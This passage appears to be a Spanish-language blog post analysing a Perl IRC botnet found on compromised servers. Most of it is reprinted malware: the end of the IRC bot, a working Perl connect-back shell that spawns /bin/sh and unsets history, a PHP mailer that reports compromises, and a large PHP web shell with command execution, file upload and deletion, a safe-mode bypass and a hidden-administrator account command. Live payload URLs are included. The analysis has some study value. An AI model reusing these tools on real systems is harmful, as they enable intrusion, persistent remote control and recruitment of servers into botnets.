push( @l, $link, $host, $hdir );
return @l;
}
sub query() {
$link = $_[0];
my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub os() {
my $site = $_[0];
my $ret = &query($site);
while ( $ret =~ m/uname -a:(.+?)\/g ) {
$un = $1;
}
while ( $ret =~ m/os:(.+?)\/g ) {
$os = $1;
}
while ( $ret =~ m/id:(.+?)\/g ) {
$id1 = $1;
}
while ( $ret =~ m/free:(.+?)\/g ) {
$free = $1;
}
while ( $ret =~ m/used:(.+?)\/g ) {
$used = $1;
}
while ( $ret =~ m/total:(.+?)\/g ) {
$all = $1;
}
}
sub cgi_os() {
my $site = $_[0];
my $re = &query($site);
while ($re =~ m/^(.*)$/g) {
$un_cgi = $1;
}
}
sub unici {
my @unici = ();
my %visti = ();
foreach my $elemento (@_) {
$elemento =~ s/\/+/\//g;
next if $visti{$elemento}++;
push @unici, $elemento;
}
return @unici;
}
sub writ1 () {
my $cont = $_[0];
print $c0n "PRIVMSG $chan1 :$cont\n";
}
sub writ2 () {
my $cont = $_[0];
print $c0n "PRIVMSG $chan2 :$cont\n";
}
sub priv8 () {
my $cont = $_[0];
print $c0n "PRIVMSG $chan2 :$cont\n";
}
## PRIVATE
## Coded by BitchX and Osirys
Este script esta intersante, esta hecho para tomar comandos desde IRC para hacer scans masivos, infectar mas servers y agregarlos dentro de la botnet y reportarse (me encantaron sobre todo los passwords en los que podemos tomar control de la botnet nosotros mismos) asi tambien agregaron y ejecutaron los siguientes scripts:
http://matudesign.com/dh/imagenes/02.txt
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Olhando o servidor...\n";
print "[*] ConectandO... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by by xiP / eu kero comprar meu carroOOOo..!!! ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Ojo con el MAESTRO del system (me preugnto yo para que hacer tanto show y que pasa si no esta el command o peor eso se ve fuertisimo pero bueno no podemos pedir demaciado, jejejejeje
Y esta preciosura tambien:
';
mail("math3us1m@hotmail.com", $asunto, $msg, $cabeceras);
?>
Manda un email a math3us1m@hotmail.com avisandole del hack, mandemosles muchos y muchos correos de hack! jajajaja porque no?
Y para mantener el control usan: http://matudesign.com/dh/imagenes/cmd-shell.txt
--== ?YOUNGEST? Hack Shell==--
OFF"; }
else { $SafeMode = "$SafeMode"; }
$btname = 'backtool.txt';
$bt = 'http://www.smashed-radio.com/forum/cmds.txt';
$dc = 'http://www.smashed-radio.com/forum/cmds.txt';
$newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup
"Administrators" /add Admin;net localgroup "Users" /del
Admin';
$bn = 'http://www.smashed-radio.com/forum/cmds.txt';
// Java Script
echo "";
// End JavaScript
/* Functions */
function cmd($CMDs) {
$CMD[1] = '';
exec($CMDs, $CMD[1]);
if (empty($CMD[1])) {
$CMD[1] = shell_exec($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = passthru($CMDs);
}
elseif (empty($CMD[1])) {
$CMD[1] = system($CMDs);
}
elseif (empty($CMD[1])) {
$handle = popen($CMDs, 'r');
while(!feof($handle)) {
$CMD[1][] .= fgets($handle);
}
pclose($handle);
}
return $CMD[1];
}
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = " Pintu Masuk ke Direktori, OK!";
} else {
$msg = "Error: Gagal masukkan ke folder!";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}
$chdir = str_replace(chr(92), chr(47), $chdir);
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .
$_FILES['userfile']['name'])) {
$msg = "{$_FILES['userfile']['name']}, Upload File Berjaya.
";
} else {
$msg = "Error: Upload File Gagal.";
}
}
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "{$newdir}, folder
berhasil dibuat. ";
} else {
$msg = "Error: Pembuatan folder
gagal.";
}
}
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "{$newfile}, berhasil
dibuat! ";
} else {
$msg = "Error: Tak Boleh Buat File!";
}
}
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "{$file}, Berhasil
menghapus arsip (file)!";
} else {
$msg = "Error: Gagal menghapuskan File
(file)!";
}
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "{$file}, Berhasil
menghapus folder!";
} else {
$msg = "Error: Gagal menghapuskan
folder!";
}
}
}
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {
$msg = "Chmod dari {$_GET['file']} berubah
menjadi
$chmod :
Sukses!";
} else {
$msg = 'Error: Gagal mengubah
chmod.';
}
}
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "Archive {$file}
named for {$newname} successfully!";
} else {
$msg = "Error: Gagal menukar File.";
}
}
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "{$file}, disalin
menjadi {$copy}
Berhasil!";
} else {
$msg = "Error: Gagal menyalin {$file} menjadi
{$copy}";
}
}
/* Parte Atualiza 02:48 12/2/2006 */
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }
$cmd = stripslashes(trim($cmd));
$result_arr = cmd($cmd);
$afim = count($result_arr); $acom = 0; $msg = '';
$msg .= "
Hasil : ".$cmd."
";
if ($result_arr) {
while ($acom <= $afim) {
$msg .= "
".@$result_arr[$acom]."
";
$acom++;
}
}
else {
$msg .= "
Error: Gagal Menjalankan perintah.
";
}
}
elseif (@$_GET['action'] == 'safemode') {
if (@!extension_loaded('shmop')) {
echo "Loading... module";
if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) {
@dl('php_shmop.dll');
} else {
@dl('shmop.so');
}
}
if (@extension_loaded('shmop')) {
echo "Module: shmop loaded!";
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire
length of
data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for
deletion."; }
echo passthru("id");
shmop_close($shm_id);
} else { echo "Module: shmop tidak dimuat!"; }
}
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {
while ($zip_entry = zip_read($zip)) {
$msg .= "Name: " . zip_entry_name($zip_entry) . "\n";
$msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) .
"\n";
$msg .= "Compressed Size: " .
zip_entry_compressedsize($zip_entry) . "\n";
$msg .= "Compression Method: " .
zip_entry_compressionmethod($zip_entry) . "\n";
if (zip_entry_open($zip, $zip_entry, "r")) {
echo "File Contents:\n";
$buf = zip_entry_read($zip_entry,
zip_entry_filesize($zip_entry));
echo "$buf\n";
zip_entry_close($zip_entry);
}
echo "\n";
}
zip_close($zip);
}
}
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";
$conteudo = @file_get_contents($filename);
$conteudo = htmlspecialchars($conteudo);
$back = $_SERVER['HTTP_REFERER'];
echo "
Editing {$file} ...
";
echo "
| "; echo " "; echo " | "; echo "
Esta un poco mejor shell99, pero tampoco esta mal, lo que si es que se ve que han tenido tiempo no para desarrollar sino para encontrar los scripts y usarlos, interesante se ve que hay una o 2 personas que mas o menos le dan a la codificacion en perl y un poco en PHP pero en realidad las botnets no estan muy desarrolladas.
Esta decente el botnet, se puede tomar control de ella y obvamente no hacen mucho por generar una botnet mas compleja y mas grande, sin embargo me da la idea para desarrollar una de prueba de concepto durante estas fechas que ando de relax de programar en python para pruebas de volumen.
Bueno despues de tanto codigo .. me lanzo ….